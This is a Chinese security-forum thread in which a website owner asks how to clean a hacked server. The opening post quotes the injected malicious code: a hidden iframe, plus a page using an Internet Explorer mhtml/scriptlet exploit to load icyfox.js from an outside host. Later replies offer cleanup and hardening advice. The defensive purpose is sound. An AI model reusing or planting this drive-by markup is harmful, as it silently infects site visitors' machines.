|
 | 作者: jo_fox [jo_fox]
 论坛用户 |
登录 |
| 网页被植入了代码 <Iframe src="http://www.shanbei.net/chat/zhutou.htm" width="1" height="1" scrolling="no" frameborder="0"></iframe> zhutou .htm里面写的是 <HTML oncontextmenu="return false"><HEAD><TITLE> </TITLE></HEAD> <BODY> <SCRIPT language=JavaScript.Encode src="icyfox.js"></SCRIPT> <SCRIPT language=JavaScript>var url=document.location.href;url=url.substring(0,url.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\\.mht!'+url+'/icyfox.js::/%23"></OBJECT>');window.status=" ";</SCRIPT> <OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht!http://www.shanbei.net/chat/icyfox.js::/%23></OBJECT><NOSCRIPT><iframe style="display:none;" src='*.*'></iframe></NOSCRIPT></BODY></HTML> icyfox.js文件不知道是什么内容 我们的网站地址:qdlover.gamebox.com.cn 斗争了一天了,这个黑客还算不错,只是不停的把代码加入网页,还没做破坏性的动作 用金山毒霸木马专杀杀过了,原来有安装rootkit木马,已经清除 可是那个黑客还是能不断地修改我的网页阿 请高手帮忙看看qdlover.gamebox.com.cn上面有什么漏洞啊 真是快郁闷死了 |
| 地主 发表时间: 04-10-08 02:13 |
| 回复: jo_fox [jo_fox] 论坛用户 |
登录 |
|
高手来看看啊 我现在只发现以下端口不知道是什么东西 1025:LISTEN - listen Port Type TCP Found Audits 0 3372:UNKNOWN - Unknown Service Port Type TCP Reply Banner in Request �� Found Audits 0 |
| B1层 发表时间: 04-10-08 11:04 |
| 回复: uncracker [uncracker]  论坛用户 |
登录 |
|
哪有什么东西 |
| B2层 发表时间: 04-10-08 15:23 |
| 回复: jo_fox [jo_fox] 论坛用户 |
登录 |
|
怕是系统进程已经给嵌入了后门 杀不干净啊 |
| B3层 发表时间: 04-10-08 16:09 |
| 回复: jo_fox [jo_fox] 论坛用户 |
登录 |
|
唉,果然,他又开始给我改文件了 |
| B4层 发表时间: 04-10-08 16:14 |
| 回复: jo_fox [jo_fox] 论坛用户 |
登录 |
|
我真是要哭了 明天去机房重新安装 但是我找不到漏洞还会被搞阿 |
| B5层 发表时间: 04-10-08 16:49 |
 | 回复: best [best]  论坛用户 |
登录 |
|
你开了什么端口? |
| B6层 发表时间: 04-10-08 17:01 |
| 回复: jo_fox [jo_fox] 论坛用户 |
登录 |
|
网址都给了,你扫扫不就知道了 |
| B7层 发表时间: 04-10-08 17:30 |
 | 回复: tom_grace [tom_grace] 论坛用户 |
登录 |
|
警告 netbios-ns (137/udp) The following 2 NetBIOS names have been gathered : A-A1497CBE26EC4 WORKGROUP = Workgroup / Domain name The remote host has the following MAC address on its adapter : 00:10:dc:f1:25:ac If you do not want to allow everyone to find the NetBios name of your computer, you should filter incoming traffic to this port. Risk factor : Medium CVE_ID : CAN-1999-0621 NESSUS_ID : 10150 只能帮你到这里了。我也是一菜* 但说实话,我不是很喜欢你说话的方式! 不过还是希望你能早日解决问题! |
| B8层 发表时间: 04-10-10 08:30 |
 | 回复: song110 [song110]  论坛用户 |
登录 |
|
我是一点也看不懂呀? 你们这是什么呀? |
| B9层 发表时间: 04-10-10 09:47 |
| 回复: vuqsssft [vuqsssft] 论坛用户 |
登录 |
|
我什么都不懂啊 ~~~~~~~~~~~~~~~~``原来我是一头猪 |
| B10层 发表时间: 04-12-14 23:07 |
| 回复: TomyChen [quest]  版主 |
登录 |
|
先把网站停了,把所有的ASP文件都下载下来检查一下,里面有可能已经被种上ASP木马。 如果是虚拟主机,唯一的办法就是将情况提供给供应商,要求他们配合工作,因为如果是我种,我不会种马,不会种到你的目录里。 看进程吧,应该有个bat(bat比较多,除非他有时间写了个.exe),在不断的修改文件。 其他的就是看木马、后门的清除方式,还有rootkit。 记得弄好后把权限配置一下,IIS的,把执行ASP组件给干掉,如果没必要别装perl/php |
| B11层 发表时间: 04-12-15 00:00 |
 | 回复: liximi [liximi] 论坛用户 |
登录 |
|
你有没有防火墙啊,不会把除了80端口以外的任何端口都关掉啊 |
| B12层 发表时间: 04-12-15 00:01 |
| 回复: TomyChen [quest] 版主 |
登录 |
|
木马是通过IE感染的,也是被动感染,不关防火墙的事 |
| B13层 发表时间: 04-12-15 00:24 |
 | 回复: teczm [teczm]  版主 |
登录 |
网站服务器怎么会用IE |
| B14层 发表时间: 04-12-15 11:24 |
| 回复: TomyChen [quest] 版主 |
登录 |
|
不知道是不是我小学语文没学好=.=" 服务器开了80,被植上ASP木马,能过IIS的执行组件执行程序等可能性,不排除通过其他方式。然后通过修改web上的某个页面.html/.asp文件中,跳转执行恶意代码,达到传播目的。 |
| B15层 发表时间: 04-12-15 12:07 |
 | 回复: iced [iced] 论坛用户 |
登录 |
|
先看看我能不能回复 |
| B16层 发表时间: 04-12-15 18:14 |
| 回复: iced [iced] 论坛用户 |
登录 |
|
好的,可以回复你 哎~首先替你感到可惜,给你上木马的人其实不是什么黑客,最多就是个懂点安全知识的人了 你页面上的东西是冰狐浪子写的利用IE漏洞的木马网页 呵呵~哪个icefox.js是其中的重点哦 你可以在你的FTP中找到这个JS,然后按藤找瓜,把里面的exe或者是com等可执行文件找出来,然后删除,再把这个JS删除就OK了,别人就不会中木马了 num2 恭喜你,你的服务器还没有被攻下呢,呵呵,主要是他比较菜吧 你现在马上禁止FSO的主键,然后分配权限,让everyone组的用户对目录只有只读,这可以暂时防止你的主页被修改 其次,如果你是虚拟主机,呵呵,没办法,转移地点吧,然后想服务器管理员申述,谁叫你不是管理员呢,他可能把后门放在其他的地方了,但是你说你可以看到port 我估计这个主机是你的 那你马上引用IPSEC策略,把这个1025禁止,或者是安装防火墙,探测到登陆你的IP,嘿嘿,消灭他~~ num3 你说你删除了他的ROOTKIT了,他还可以修改你的主页,呵呵,很简单的原理了,他一定用了哪个插入代码了 你所有的ASP检查一下 注意,在asp的html里面一定有一个你没有见到过的script把那句代码删除就是了 呵呵,恭喜你http://www.shanbei.net/chat/icyfox.js代码已经没有了,但是你还是要小心哦 bye |
| B17层 发表时间: 04-12-15 18:24 |
 | 回复: z7 [skyzz] 论坛用户 |
登录 |
|
楼上很详细啊 漂亮 ~ |
| B18层 发表时间: 04-12-17 16:49 |
| 回复: uncracker [uncracker] 论坛用户 |
登录 |
|
very good |
| B19层 发表时间: 04-12-17 20:50 |
 | 回复: wyq980 [wyq980] 论坛用户 |
登录 |
 |
| B20层 发表时间: 04-12-18 09:16 |
 | 回复: qmdjzgqt [qmdjzgqt] 论坛用户 |
登录 |
 |
| B21层 发表时间: 04-12-18 20:23 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
我觉得主要问题还是出在网站有注入漏洞! 如果有这个漏洞 那么你即使把别的做的在好,他还是一样有办法把ASP木马写到你的网站上! 所以你先把这个漏洞封掉 过滤掉特殊字符, 然后在去找他写在你网站里面的ASP木马! 实在不行你就把原来网站备份文件覆盖原来的文件!(数据库除外) 然后就是给服务器的IIS设置权限 把IIS用户权限设置GUEST 然后把所有盘都设置成只允许ADMINISTRATORS组权限的用户访问 把硬盘所有分区的Everyone控制权限删除! |
| B22层 发表时间: 04-12-21 16:05 |
| 回复: m-k [zc9399mk] 论坛用户 |
登录 |
|
完了!你死定了!哭吧!男人哭吧哭吧不是罪! |
| B23层 发表时间: 04-12-29 08:42 |
| 回复: Nebulae [xingyun] 论坛用户 |
登录 |
|
楼上别幸灾乐祸了 |
| B24层 发表时间: 05-01-08 08:43 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 网站服务器被黑,向高手求救